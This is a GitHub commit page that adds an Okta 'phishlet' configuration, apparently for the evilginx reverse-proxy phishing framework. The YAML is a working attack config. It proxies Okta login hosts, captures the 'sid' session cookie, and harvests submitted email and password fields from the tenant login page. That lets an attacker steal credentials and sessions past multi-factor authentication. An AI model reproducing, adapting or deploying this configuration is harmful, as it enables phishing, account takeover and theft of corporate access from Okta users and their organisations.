Skip to content

Commit

Permalink
Merge pull request kgretzky#175 from ahhh/patch-2
Browse files Browse the repository at this point in the history
added okta phishlet
  • Loading branch information
kgretzky authored Jan 23, 2019
2 parents 9ee2321 + 0ef8af7 commit 21ff93f
Showing 1 changed file with 22 additions and 0 deletions.
22 changes: 22 additions & 0 deletions phishlets/okta.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
author: '@mikesiegel'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
sub_filters: []
auth_tokens:
- domain: 'EXAMPLE.okta.com'
keys: ['sid']
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'EXAMPLE.okta.com'
path: '/login/login.htm'

0 comments on commit 21ff93f

Please sign in to comment.